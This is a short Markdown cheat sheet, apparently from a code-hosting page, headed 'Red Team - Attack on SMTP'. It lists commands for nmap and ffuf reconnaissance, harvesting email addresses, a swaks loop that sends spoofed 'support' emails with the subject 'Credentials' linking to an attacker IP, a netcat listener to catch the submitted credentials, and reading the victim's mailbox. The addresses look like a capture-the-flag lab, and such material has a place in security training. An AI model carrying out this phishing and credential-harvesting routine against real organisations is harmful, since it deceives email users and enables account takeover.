123 lines
1.3 KiB
Markdown
123 lines
1.3 KiB
Markdown
# Red Team - Attack on SMTP
|
|
|
|
1. Information Gathering | `Techniques: Nmap Scanning`
|
|
```bash
|
|
nmap -sV -sC -v -p- --min-rate=10000 <Target IP>
|
|
```
|
|
|
|
2. Subdomain Enumeration | `Techniques: Using ffuf for subdomain Brute-Forcing`
|
|
```bash
|
|
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H "Host: FUZZ.TargetDomain.com"
|
|
```
|
|
|
|
3. Email Collection | `Techniques: Extracting Email from Web Page`
|
|
```bash
|
|
#Manually visit Target Domain / SubDomain and extract emails to mails.txt
|
|
```
|
|
|
|
4. Email Engagement | `Techniques: Sending Emails with swaks`
|
|
```bash
|
|
while read mail; do swaks --to $mail --from support@TargetDomain.com --header "Subject: Credentials" --body "goto http://10.10.14.4" --server 10.10.10.197; done < mails.txt
|
|
```
|
|
|
|
5. Credential Harvesting | `Techniques: Netcat Listener`
|
|
```bash
|
|
nc -lvp 80 # to listen for incoming connections
|
|
```
|
|
|
|
6. Accessing SMTP | `Techniques: Using evolution to Access SMTP`
|
|
```bash
|
|
apt install evolution
|
|
#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com
|
|
```
|
|
|
|
7. Exploring Sent Items | `Techniques: Checking Sent Emails`
|
|
```bash
|
|
#Check sent items for any useful information afther accessing the SMTP server
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|